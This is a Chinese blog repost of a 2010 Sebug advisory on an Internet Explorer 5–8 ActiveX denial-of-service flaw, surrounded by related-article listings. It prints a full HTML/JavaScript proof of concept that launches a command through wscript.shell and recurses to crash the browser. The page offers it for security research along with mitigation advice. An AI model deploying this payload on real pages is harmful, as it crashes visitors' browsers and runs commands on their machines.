Internet Explorer 无限循环拒绝服务漏洞

最新推荐文章于 2023-03-01 16:09:21 发布

URnotFish

最新推荐文章于 2023-03-01 16:09:21 发布

阅读量436

点赞数

文章标签： internet function windows 浏览器 shell 2010

本文链接：https://blog.csdn.net/URnotFish/article/details/6489024

版权

SSV ID: 19286

SEBUG-Appdir: Internet Explorer

发布时间:2010-03-18

信息提交: liscker (liscker_at_hotmail.com)

影响版本:

Internet Explorer 5
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

漏洞描述:

该漏洞存在于ActiveX控件中.
攻击者可以构造恶意页面诱使用户访问，恶意代码可运行任何Windows命令，消耗大量内存，导致访问者IE浏览器崩溃。

<*参考

http://sebug.net

测试方法:

[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<html>
<title>Liscker@hotmail.com</title>
<head>
<script type="text/javascript">
function sucks()
{
var shell=new ActiveXObject("wscript.shell");
shell.Run("calc", 1);
}
function asheesh()
{
sucks();
window.οnerrοr=new Function("history.go(0)");
window.print();
asheesh();
}
asheesh();
</script>
</head>
<body onLoad="asheesh()"></body>
</html>

SEBUG安全建议:

禁止ActiveX控件自动运行。
不要手工运行该类控件运行。

// sebug.net [2010-03-18]

// http://sebug.net/vulndb/19286/

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

URnotFish

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

[系统安全] 十八.病毒攻防机理及WinRAR恶意劫持漏洞(bat病毒、自启动、定时关机、蓝屏攻击)

杨秀璋的专栏

02-03

6665

作者前文介绍了Windows PE病毒，包括PE病毒原理、分类及感染方式详解；这篇文章将讲解简单的病毒原理和防御知识，并通过批处理代码和漏洞（CVE-2018-20250）利用让大家感受下病毒攻击的过程，提出了安全相关建议，包括自动启、修改密码、定时关机、蓝屏、进程关闭等功能。这些基础性知识不仅和系统安全相关，同样与我们身边常用的软件、操作系统紧密联系，希望这些知识对您有所帮助，更希望大家提高安全意识，安全保障任重道远。

爬虫练习--爬取CNNVD相关漏洞

qinlingheshang的博客

06-07

6424

目标从国家信息安全漏洞库（CNNVD）中爬取目标软件的相关漏洞，统计漏洞类型、危害等级、相关数量等，并进行可视化。具体流程构造URL，根据关键词爬取相关软件的漏洞信息，统计其数量和网页数构造URL，一个一个网页的爬取，找到每个具体漏洞的链接，保存这些链接根据每个具体漏洞的链接，爬取相关页面，用正则表达式和BeautifulSoup找到我们需要的链接。代码实现结果可视化...

参与评论您还未登录，请先登录后发表或查看评论

Microsoft IE 浏览器中Frameset远程拒绝服务漏洞

冷血书生的专栏

06-08

789

受影响系统： Microsoft Internet Explorer 6.0 SP2不受影响系统： Microsoft Internet Explorer 7 Beta 2描述： Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。Microsoft IE处理畸形网页时存在漏洞，远程攻击者可以通过诱骗用户访问恶意的WEB页面导致IE崩溃。

Web下的拒绝服务漏洞(DoS)

yggcwhat

09-29

2505

Web下的拒绝服务漏洞(DoS)

Windows写字板HTML帮助文件处理远程代码执行漏洞

URnotFish的专栏

03-19

735

IE8 -- 此网页上的问题导致 Internet explore 关闭并重新打开该选项卡

weixin_33835103的博客

03-28

3287

提醒一：此网页上的问题导致 Internet explore 关闭并重新打开该选项卡提醒二：在网站导致失败或崩溃时，Internet Explorer 将尝试还原此网站。它将在尝试两次之后停止，以避免无限循环。提醒三：为了有利于保护安全性，Internet Explorer 已限制此网页运行可以访问计算机的脚本或ActiveX控件。请单击这里获取选项。 ...

面向循环的编程：一种新的代码重用攻击以绕过现代防御

03-12

为了实现这种新型攻击，研究人员针对32位x86平台上的Internet Explorer 8浏览器开发了一个概念验证（Proof of Concept）漏洞利用。通过这个示例，他们展示了LOP攻击的有效性，并证明了它能够绕过现有的安全防御。 ...

Find-Sec-Bugs 漏洞范例

zhaohonghan的博客

04-03

1万+

Find-Sec-Bugs 漏洞范例欢迎使用Markdown编辑器你好！这是你第一次使用 Markdown编辑器所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章，了解一下Markdown的基本语法知识。新的改变我们对Markdown编辑器进行了一些功能拓展与语法支持，除了标准的Markdown编辑器功能，我们增加了如下几点新功能，帮助你用它写博客： ...

IE浏览器提示网站还原错误

槿梵梵博客

07-01

2407

网上找了很多的方法，重置浏览器设置，降低自定义安全级别，添加受信任站点、禁用加载项、清除历史缓存记录等皆无用。一、解决方法重启电脑之后，再访问问题就能解决了。该方法仅个人实验得出来...

在浏览器访问 Oracle EBS 应用程序踩坑记

热门推荐

jszj的专栏

07-01

1万+

近日浏览163新闻网时，发现打开一个链接后很快就会提示“Internet Explorer 已不再尝试还原此网站。该网站看上去仍有问题。”，如下图：这个有点奇怪，打开其它网站比如csdn就没有问题，包括百度上搜索出来的结果点进去也同样没有问题，难道是163网站确实有问题？我去同事电脑上试了一下，就是正常的，没有我的问题，那说明还是我的电脑有问题。然后直接百度“Internet Explore

Internet Explorer 已不再尝试还原此网站该网站看上去仍有问题

mtx_liu的专栏

10-01

7737

Internet Explorer 已不再尝试还原此网站。该网站看上去仍有问题。往往是IE8引起的。这个问题很经典。 XP系统经常会遇到。好像好多人都在问；答案大多是重置默认设置（作用好像不是很大），禁用某些插件（好像时常会有些作用）重装IE6, 重装系统 ...... 呵呵，其实换个浏览器是最好方法。当然，继续用

Internet Explorer 已停止工作解决办法

qlexcel的专栏

05-03

1万+

今天电脑出现“Internet Explorer 已停止工作”，而且一直弹出来。网上的方法都试过了，无果。然后直接把Internet Explorer的文件夹删除，就解决了。如果怕有IE残余的，当然可以先卸载IE，再删除IE的文件夹。“控制面板”-“打开或关闭Windows功能”把IE前面的勾去掉，点确定就可以卸载了。然后在C盘“Program Files“和”Program Files (x86...

关于IE提示“Internet Explorer无法打开站点,已终止操作”的解决办法

weixin_30482383的博客

08-20

126

关于IE提示“Internet Explorer无法打开站点,已终止操作”的解决办法在页面还没有ready的时候就调用了htmlObject的appendChild或者innerHTML操作，这样会在IE上弹出一个对话框：“Internet Explorer无法打开站点,已终止操作” 　　解决办法大概为以下两点： ...

开发Internet Explorer右键菜单：0rz.tw缩网址示例

本文档详细介绍了如何在Internet Explorer浏览器中自定义右键功能表（ContextMenu），以0rz.tw的缩网址功能为例进行说明。在开发过程中，关键步骤包括以下几个方面： 1. 注册表结构：Internet Explorer的右键菜单...